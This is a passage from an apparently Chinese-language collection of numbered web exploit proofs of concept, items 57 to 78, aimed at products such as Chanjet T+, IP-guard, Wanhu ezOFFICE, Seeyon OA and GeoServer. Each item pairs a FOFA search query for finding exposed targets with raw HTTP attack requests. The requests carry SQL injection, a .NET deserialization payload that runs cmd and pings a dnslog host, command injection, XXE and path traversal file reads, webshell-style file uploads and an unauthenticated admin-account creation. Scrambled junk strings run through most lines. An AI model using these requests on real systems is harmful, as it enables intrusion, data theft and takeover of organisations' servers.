POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
  `# ?6 u" o7 iHost: x.x.x.x
& a; X6 H1 Q0 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36. F( x) S( ]+ Z! N" a3 o# I
Content-Type: application/json: b; ^: J7 H0 f- K3 n
, q" }- x- v# g) a- l, Y6 l. m
{( K; w0 w# e: A2 U) }8 q/ f
  "storeID":{, Q3 X2 F+ W5 B/ L' ~. `2 q
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
$ T! K5 r7 c! F3 T   "MethodName":"Start",
) y/ m3 X* _% \. y    "ObjectInstance":{
8 p0 q. ?: I9 D; C1 P4 K7 G1 C0 G" L       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% Z5 b0 u- Q, E; Z% \
        "StartInfo": {
+ p" O$ ^5 g/ e3 X! x- q3 B           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",1 P2 x* E- S7 ?, P/ E; i3 L1 e) ?
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
+ O( ]1 f0 y" r; ]+ f7 P/ B       }
9 M4 R9 Z, j" K3 L    }
7 `0 o! g4 Z$ Z5 W8 b2 W# U  }
( N2 D, V; N! u* D/ V: @) Q}  \  K. R$ T2 @7 [* m9 s* o# N! B

& C# ^0 p+ @2 v5 r3 v, g. E9 q- K, T# j! {* X# F1 }4 E
57. 畅捷通T+ keyEdit.aspx SQL注入# k! j3 S  u9 C$ R$ ?9 [
FOFA:app="畅捷通-TPlus"
/ E7 {3 a, v% I( @  ]GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.18 `5 D' J! W$ ?8 Q$ l" j
Host: host
. R) ~8 r; o! P- g2 w' ]User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( y, e& T% y) s; CAccept-Charset: utf-8
* ~' W/ e7 S- ]0 \; nAccept-Encoding: gzip, deflate
' H8 V/ b" L$ _* e5 o( B6 g, |Connection: close
, B# g1 s8 h2 n  v, e
( F7 V; {2 \8 A0 Q6 r2 y- G; _9 y' u4 u- r" ]* c, P
58. 畅捷通T+ KeyInfoList.aspx sql注入- }6 F4 B% q5 }2 T. c
FOFA:app="畅捷通-TPlus"
: i; O% E! f& L) {GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1# G/ h' J# R% i
Host: your-ip% @' N9 R* ~, m' `0 R
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36, f" L( ?7 n$ }+ Z
Accept-Charset: utf-8
( M# s" y3 K6 ^! t9 ~' r. K( hAccept-Encoding: gzip, deflate; q3 E. e& e! d
Connection: close  i, v8 F, M8 W# t1 a; k
8 y& G5 a1 p5 E( M5 I. Y
- q% c8 S- ?- e% K
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行* c, j, G5 j& D# B
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"5 m& n* U) L0 p1 Q8 ?9 L4 j
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1, X( w1 r5 L9 Z: `% D  n9 V
Host: 192.168.86.128:9090: v! G+ n* Y6 N4 W* T
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36, o/ u) B' v9 J* ^% T0 Y* d
Connection: close* m0 \) X* k, T# K
Content-Length: 1669
; P" M# [( M! P1 GAccept: */*& o+ k: I' D, u2 N9 G& f! @2 B
Accept-Language: en
7 z/ v, f2 b( k; B6 U6 J: o7 \( j: eContent-Type: application/x-www-form-urlencoded
' ^6 M/ o1 }% v5 SAccept-Encoding: gzip
/ `. I3 z) X4 Q" A4 s( [" X, p
4 J$ P# W5 A! T/ H- LPAYLOAD
) c- F+ v8 {: J  h7 B0 Z3 I* \
; b- E8 x9 C& G7 l+ B( W# j. l: o9 p8 p# C  z" V( `: T2 g
60. 百卓Smart管理平台 importexport.php SQL注入
( l- f; l0 c" _; o& W+ UFOFA:title="Smart管理平台"
; g4 O% u- C3 E' XGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
- F! ~  L* J4 B4 E9 P4 s. zHost:
7 {; F& Y9 K! `5 I9 c0 n# _, uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- a3 r! ?: \2 @0 l+ c) L. B) `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& x( o# [: H. k. m3 ]+ T  F) SAccept-Encoding: gzip, deflate  b0 g, T% i5 A
Accept-Language: zh-CN,zh;q=0.9
- K" W1 l- d( l6 X2 l- y1 EConnection: close* m) E. l4 Z: U6 Q) S# }3 R% R

0 ^: {, z+ f8 v
0 r. q/ m) A! o# a6 B: n. ]61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
9 i8 b. P0 ], z$ d/ ?* ^1 P( MFOFA: title="欢迎使用浙大恩特客户资源管理系统"! J' H8 A7 {: @4 h" B7 Y; S7 H
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1: F  A$ n( I9 P4 p, X  C& N
Host: x.x.x.x
$ z& b! K$ \7 E  \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* R5 Q3 A* @' j/ ^5 ~Connection: close+ e8 r# m3 t1 P
Content-Length: 27
0 |' R" H2 j8 ^& X% tAccept: */*1 Y8 Z6 {& s! W: a. P7 b
Accept-Encoding: gzip, deflate
  ^  O$ B9 e" |9 [3 F% MAccept-Language: en
9 L9 I0 L: ]) w& B% r3 NContent-Type: application/x-www-form-urlencoded
2 X1 s* V3 R7 L9 W' h$ K
7 y8 ]1 u. I( U& f3 D8uxssX66eqrqtKObcVa0kid98xa
# J9 Z$ J0 E' l0 A% C4 ?) R, x
6 k2 Q8 R  g6 f: C0 B5 b2 j- V& b( u$ h
62. IP-guard WebServer 远程命令执行
' N1 F6 z, k5 ]- _5 ~7 I9 D' ]FOFA:"IP-guard" && icon_hash="2030860561"/ n  ?$ d* Q% L/ P  t! o
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1& X: s- R* L+ \, B
Host: x.x.x.x
" O: `9 ^+ u& I# ^" S; r: lUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.369 G  T6 g$ m! \5 C
Connection: close3 G) e2 y8 t9 t9 K2 r: p+ u
Accept: */*2 E4 J4 v; g% J  S
Accept-Language: en0 y7 [/ j) i6 O+ T
Accept-Encoding: gzip+ g1 K2 b2 D, y% k5 N6 f! u* b
1 }5 d& [. ^( R, p$ T

( i) d  Q* X: H9 w/ K7 w' u; T访问
3 E: J4 Y8 J* i- z. ~7 B
; M; x2 l) d3 hGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
9 F- ?* w+ p3 [* z+ W% [Host: x.x.x.x
6 L$ H9 K1 K6 M& X$ ?& B4 D. n% B2 \; ^& ~# N/ Y% \
; T' |0 U! u4 K  \. \0 N
63. IP-guard WebServer任意文件读取
5 C0 ?* D& u5 _  r6 |; VIP-guard < 4.82.0609.0
; D' ?3 l# x1 n3 ]0 oFOFA:icon_hash="2030860561". m! [, V6 @/ \9 n% h; {' h2 S0 Z
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1# d2 o2 V  Y# N( r! e6 U3 A% R7 [
Host: your-ip
* Z! a& ?; \7 U' zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' i8 {/ j( A! v* tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 D( ~! f: j/ H, d- @% e# OAccept-Encoding: gzip, deflate
, K5 m5 l0 t$ t( e/ l- U; wAccept-Language: zh-CN,zh;q=0.9
" O2 J% j. N+ r& x( ^Connection: close
3 x% D- a, S9 |. ~5 i! rContent-Type: application/x-www-form-urlencoded: B  v' l' Q5 g  `8 M; E
* i: U. r( j' }
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A1 ?5 X1 i( T7 Z( e- h

5 q; e0 y+ A: k3 N  S- t64. 捷诚管理信息系统CWSFinanceCommon SQL注入
+ M0 G% t) i6 {& a: d3 |FOFA:body="/Scripts/EnjoyMsg.js"
8 C9 \% h8 N1 b. [POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1& w! j  C8 J. w7 K1 P
Host: 192.168.86.128:9001
4 e6 f4 B, u) S1 |8 i/ M9 T. p( hUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36. v' }  U3 j% Z1 v& ~+ B) t1 g
Connection: close
# J( t2 U( v9 I9 K8 yContent-Length: 369* c6 P/ J1 W3 C8 j
Accept: */*7 c1 [# W. S- W- B4 H. [
Accept-Language: en
% [4 e4 U7 h) j; N+ X0 X7 k8 ZContent-Type: text/xml; charset=utf-8
. t0 c7 J, V, ~3 h, Z2 OAccept-Encoding: gzip0 |3 Q. ], U4 z; |" }0 F' T
9 `2 i: ~6 F: T* M2 N" o" @
<?xml version="1.0" encoding="utf-8"?>) |8 n5 i! [7 J6 b/ j* g9 W8 V
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* s( d5 y5 x+ D<soap:Body>
+ S1 l  ]# f$ a    <GetOSpById xmlns="http://tempuri.org/">" p# Y" e3 g$ I* g# }3 h6 s3 N
      <sId>1';waitfor delay '0:0:5'--+</sId>
7 e/ `# h% S7 U2 J    </GetOSpById>
  \) {, y8 p  h' D  </soap:Body>' Q  f; F2 S. N" {
</soap:Envelope>/ H9 n% n9 N; Z. `+ t) a7 J& B9 ^) D
0 g' l. l" O1 E, J# B0 d
1 n( M+ G3 M, I
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过! h* l. F. l( P/ i
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"8 ^8 K/ Z3 W8 m# u
响应200即成功创建账号test123456/123456% i6 ^0 j+ D6 D. \; M/ Z
POST /SystemMng.ashx HTTP/1.1
8 ?5 k1 Q- o9 B4 T, RHost:
+ c/ s# r; \7 A% @. mUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)  e! |1 M7 O( _* K+ o! c% m( n
Accept-Encoding: gzip, deflate$ t" q# g# J5 x; Z- c
Accept: */*, W* W- i8 b9 T# @9 L1 x( j
Connection: close! v  ^. V% Z& n+ c
Accept-Language: en4 [) r- g* b- x* o  U  u: d$ b
Content-Length: 1746 w* C9 t# a* `. q! L3 l8 t, [% O
* X! C3 b) o. \, Z" `. U( m
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
; P+ T% P. Q0 t. E7 E  P9 v0 c/ f. U! ~" g' X! ]& g
, k( a0 I, `- R8 }5 k  Q% t: N6 a0 L
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入$ J2 [# G& ^; x: T& ~
FOFA:app="万户ezOFFICE协同管理平台"
* u* H+ R8 p2 P: s' ]( N# f# G
6 Z) [$ |! u/ W$ W% dGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.19 P  K1 I  \& ~' F7 z. K9 S
Host: x.x.x.x
1 `! s& ~: f: t! s" Z* F$ yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
3 T5 X9 h. o# ?% j0 e* sConnection: close
. ?& n- K  q' W, Y+ f6 n* c- KAccept: */*( \0 T* W6 ^# \* i0 ?3 p* m( |
Accept-Language: en
% ?3 J0 ~5 a& ]* _0 c& w; q, _* ^Accept-Encoding: gzip% P! Y5 R; X- i  f8 N
) c/ J0 ~( ~5 D+ l4 x# }

3 S. |  @- r3 ~/ W第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在0 _. u' p/ R3 D4 h+ ~
, ?& D. I* c$ F
67. 万户ezOFFICE wpsservlet任意文件上传
6 J3 U6 d. Z  Y7 {# @FOFA:app="万户网络-ezOFFICE"
' {# `! r6 O" C0 ?( u5 s, b) YnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
- T. `. Z5 }2 vPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1/ P6 T; N( Y$ l
Host: x.x.x.x
8 |( g$ t) _( H$ s  T  g( X. u' rUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0% ~' }( o( z) a! _5 ?( T# L3 Z
Content-Length: 173! z, y* C3 v, c* O; t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.80 R4 ^- H" N. y' a
Accept-Encoding: gzip, deflate
' m/ r% S3 z0 v$ y0 V9 IAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
: J$ ]2 z6 s* E/ `% JConnection: close: b2 y7 G  _3 Q# j
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
# m$ y2 I  t5 X2 H  NDNT: 1
8 C6 y" ]8 K9 T  G2 eUpgrade-Insecure-Requests: 1. p7 x3 N" U$ y" E
& Y: `! u1 l1 K2 X4 ?% D
--ufuadpxathqvxfqnuyuqaozvseiueerp2 w; f9 p) J% }2 D( h; \
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
* v1 x$ C7 o. j6 d# N, x  E/ t; z  o4 G6 E% X
<% out.print("sasdfghjkj");%>
% o+ K. r" e  k* g7 e6 @9 b2 h--ufuadpxathqvxfqnuyuqaozvseiueerp--5 ^4 y' F, K# I

# U/ b( v% [( h7 D3 ^2 E) ^& l. q& ]* W/ \- |$ r/ Q3 T/ V/ |8 T
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp: N- C# i. Z$ ?

6 i; G% D; i+ m; V68. 万户ezOFFICE wf_printnum.jsp SQL注入
/ l# U3 W1 g# ?1 ^% yFOFA:app="万户ezOFFICE协同管理平台"
$ U* q' I- z$ b6 j' |' |8 qGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
4 i3 a9 w& I4 Q: A* qHost: {{host}}
; L4 l7 p( K/ p, @3 ]* cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
- `/ L- p; o6 ^1 F* }2 v% vAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
% X6 m2 H; l5 V8 K: KAccept-Encoding: gzip, deflate8 c$ ]; Z* u7 }) K( m0 Q
Accept-Language: zh-CN,zh;q=0.9
1 \0 j' \2 k. ?6 p2 L2 j* ?$ FConnection: close/ I, o: P  ^, }+ t  ]# k+ M* M
: c3 [! z3 G+ D; L3 A' S) ]

/ h! C1 H7 J  R3 U  L& i* Z69. 万户 ezOFFICE contract_gd.jsp SQL注入
+ g+ D5 P+ z9 r  x' m1 x" S% ]: ^) H) qFOFA:app="万户ezOFFICE协同管理平台", o0 q; S3 F) Y- o
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1  \4 c: ^3 z5 S+ ^8 l7 d. `
Host: your-ip
0 N& g8 M. e! t" m! b- b8 b; J8 mUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.366 y  U+ V( F. Q6 w  @$ i* D8 }
Accept-Encoding: gzip, deflate
) W! u. Y( M* Z( b1 {6 YAccept: */*
) Z3 i+ V7 w' i( L5 nConnection: keep-alive
5 U6 T0 K  X. E2 K0 p  R4 |4 b1 |4 Q7 {1 X8 K! {

' w! ]) B/ M: x2 W& c( Y' G70. 万户ezEIP success 命令执行
; p) W; c5 v, ~FOFA:app="万户网络-ezEIP"
/ v! M8 n" ?! O4 V2 CPOST /member/success.aspx HTTP/1.1' Q! X7 q" {2 a3 M- q2 @
Host: {{Hostname}}4 r' c$ W. T6 S* @# }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
$ W7 q0 A. h3 t! E! {1 T2 y& OSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=6 |$ E, N; J; l8 o
Content-Type: application/x-www-form-urlencoded! F# w3 y' j# f# ~2 U  V  K
TYPE: C5 P. j$ ^2 f% K* e4 A% N
Content-Length: 16702" i( r7 o9 _: \: C: {6 C

. i3 o0 W/ I9 ~  }4 t+ z% n- q" k__VIEWSTATE=PAYLOAD* D8 E7 [- u( s' i+ [1 ?, A
1 Q, ]0 q6 i) V& O6 l8 b5 u- u
# O/ f4 L  @3 k. R1 F9 v8 q
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
1 ?& z: U, m3 {+ S6 Q. p. x, QFOFA:body="PM2项目管理系统BS版增强工具.zip"
' T3 K0 d6 l9 i9 J% i% D- AGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1& b4 S8 W) q0 ^' w7 _3 k
Host: x.x.x.xx.x.x.x9 L/ K1 R6 `4 _% t  H4 a
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36; r. v! P+ M6 Y
Connection: close; S  m8 H0 l1 Q: r0 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 ?5 r* ~  X: E' F$ R% EAccept-Encoding: gzip, deflate
# M" ]5 j' X5 y* M* w* nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, ~4 M) V& X4 l
Upgrade-Insecure-Requests: 1
1 T  E: S% _9 W, f: V( ?/ H
. \; E; \( T7 t6 ^' v. v- Y$ m3 p" F1 p* L# O
72. 致远OA getAjaxDataServlet XXE
! U; Z) [- W" WFOFA:app="致远互联-OA"! K/ F1 _. z, m
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
5 v3 t" f6 p9 HHost: 192.168.40.131:8099
9 }$ @! Z6 y1 g* b; \User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
+ F' ^- L. w" O) i4 @3 K' JConnection: close
! Y* z8 u9 J  AContent-Length: 5834 u* C6 Y$ I" R
Content-Type: application/x-www-form-urlencoded
5 F2 y2 n# ~7 }& ?3 RAccept-Encoding: gzip
, I! U& s9 N1 }% V, H0 E8 T5 _4 P! C' v
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
3 r6 [& \# @0 g5 C
. z& B) z# ?" }* K* K
1 i/ |3 M% x% k; r! a# b73. GeoServer wms远程代码执行
+ u; C" [% y9 y7 Y4 o- ]FOFA:icon_hash=”97540678”
6 }4 [$ Y3 W+ d) u# oPOST /geoserver/wms HTTP/1.1/ J4 A# T( M8 b% n' _. R5 Y
Host:
1 n& l9 B/ _4 b. U1 C8 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) k% A% _' j( z3 T! X4 d" T3 BContent-Length: 1981% {' Y; G* j  F0 z
Accept-Encoding: gzip, deflate
8 |1 v5 v+ U8 ?2 V0 k& _Connection: close" N2 H& u& I5 g
Content-Type: application/xml
  W4 V- n4 O% b- {( v; {5 z5 J- I, @SL-CE-SUID: 3
9 l3 t  ^/ ?" U) }
5 [5 o& o/ A+ [- E; QPAYLOAD
. n% I  E$ U/ F1 m; ~! N" |6 k# B5 a  m# I1 w/ L& R

8 F. t  p8 p- X$ ^74. 致远M3-server 6_1sp1 反序列化RCE6 s: G; m6 s- n
FOFA:title="M3-Server"6 b4 z: @  o1 N4 ~- c. h  G
PAYLOAD4 Y+ k+ }2 E7 `1 s8 \( ]
) g1 M! j$ W/ M- b+ A$ I& t
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
6 K# M" t" e$ IFOFA:app="TELESQUARE-TLR-2005KSH"
- M) g* x) T' EGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
% `, W2 c6 K- I, d5 s: z9 x+ W! |Host: x.x.x.x
' `$ |2 }) }0 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 g  `: j) p% |
Connection: close
5 H9 t" \- q/ g, ]! ^% S4 AAccept: */*
. Q' x( ?* u# ]3 Z" {) U, t# L& O! \Accept-Language: en
% t) v9 x3 ^; s( V1 i$ {Accept-Encoding: gzip/ l4 U4 |  L5 y1 s9 Y& T

, t; V& }3 y, N) L) f! d* H7 D. }1 c2 G! I0 t
GET /cgi-bin/test28256.txt HTTP/1.1* w8 v7 o7 o  U5 k0 |# l4 v
Host: x.x.x.x1 M* Z/ j0 w  V$ [7 [
5 M* X! x) p" @8 S7 J0 @. Z
# W3 {9 H& [, i1 |8 J
76. 新开普掌上校园服务管理平台service.action远程命令执行6 b4 l0 ?3 y" \. y2 U: F2 m
FOFA:title="掌上校园服务管理平台"" m) G5 _& g  g; [
POST /service_transport/service.action HTTP/1.1+ W. k8 _, g; f
Host: x.x.x.x
4 C3 L% h8 q6 n* b+ X6 w8 W* hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
0 p" R2 Y0 B+ e# p) E, I& bConnection: close
& u  w7 K6 ~( T# v/ v4 bContent-Length: 211
* |4 Z3 F0 ]7 f6 v" [/ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 h, G* E4 Y  e, Q2 R3 ]5 kAccept-Encoding: gzip, deflate
* Q! y; X0 l# _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  b# R% S) Z# D: p! h+ e' {, TCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
: D/ a( a  e% l( a" M% m- VUpgrade-Insecure-Requests: 1* s' D# n0 |* B; ?. V

# b6 y% t5 g/ t/ o# `  o# [& c{
: E, F+ _+ b3 B% a( ?; b"command": "GetFZinfo",! g# s2 h0 @+ G6 [4 v/ o9 ]! C9 w
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
/ a0 r( Z3 v9 A: u9 o& Z  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"/ x, B0 e" ~, ^1 e
}
: i& y2 o- W; j0 f5 z  `$ a, [( v; d% B. k
% p9 K: s. x1 D: q! o* ~! ~, X# E  p
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1! N* P4 H8 f8 a8 C* ~/ B
Host: x.x.x.x
5 q/ Z  O2 `2 O& C; L0 @- G3 N' w: r  J2 _! d8 M
$ b3 {% l, i) m2 Y0 G2 s3 {+ \! D
) a4 \' H  n4 |5 o' W. ?
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
& ]5 Y/ ^' B" Z4 U# X8 W9 f6 eFOFA:body="F22WEB登陆"+ z# m4 r) p. P( O: v( Z. J
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1( x8 ?' |/ w$ g4 \4 F  S4 g
Host: x.x.x.x
  i3 y$ N% M4 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 L/ A) ~/ w! {  b* `/ h
Connection: close5 X+ }' ]* K+ V4 N; g
Content-Length: 433: f2 E8 _; [- x0 b5 N3 C, V7 u
Accept: */*, ]1 J5 D- }2 Z* I6 c9 C. u
Accept-Encoding: gzip, deflate
5 x+ C# p) o) N* Z8 p+ n& |Accept-Language: zh-CN,zh;q=0.9
  O+ J- R6 p  u! d* h0 @Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
: _+ V: ]: c  m# T4 Q* B8 D; _9 ~( i8 O8 u' g" @
------------398jnjVTTlDVXHlE7yYnfwBoix
- T. `5 H9 E3 a9 F3 h) NContent-Disposition: form-data; name="folder"" x- B$ V$ p  Y9 b- V1 x
% m! R0 `$ v( d, ?7 N9 Y
/upload/udplog
% \, V; P! D5 x# F9 L. L7 N------------398jnjVTTlDVXHlE7yYnfwBoix5 J1 Y( ]+ v0 H; Q% a; s2 h
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"% ^! I2 V# Q& d; e
Content-Type: application/octet-stream
. B" M& B5 R2 W0 w  o+ Z6 |
7 z4 v2 |! z: T$ i+ u" l8 nhello1234567
& D8 ^( e. u7 p; h) I" n------------398jnjVTTlDVXHlE7yYnfwBoix
. N4 Q& _& O5 I) uContent-Disposition: form-data; name="Upload"
$ e+ l: R: U4 `$ v, s7 B3 l
) m8 F6 t. t4 j$ vSubmit Query
8 n4 B; O  A' z& l------------398jnjVTTlDVXHlE7yYnfwBoix--
/ q* R' u% g6 e& z- e, M6 D6 l; ]  q, L& x! H3 Z, Z" k: B: n) B
0 [4 w. h5 s+ B/ k3 _
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传* A5 ]  y& l1 o$ r
FOFA:icon_hash="2001627082"
$ d* d8 Z+ }4 S! h! P4 w4 U3 P! mPOST /Platform/System/FileUpload.ashx HTTP/1.1
3 P& g; o4 w6 [( f1 g0 jHost: x.x.x.x; n2 R" d  G; v1 i" `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 [; f6 V( t' i2 f$ D# ~9 Q4 ?
Connection: close: [2 R9 y9 x: N; {# Y& H* r
Content-Length: 336
) Q+ C& ]- x0 a- oAccept-Encoding: gzip
# P) F. S) {: ?& u3 KContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l  S0 W2 s6 b" p2 Y/ B- d+ L/ m
/ M8 ~8 u6 y! R' Z. d3 r) |& F
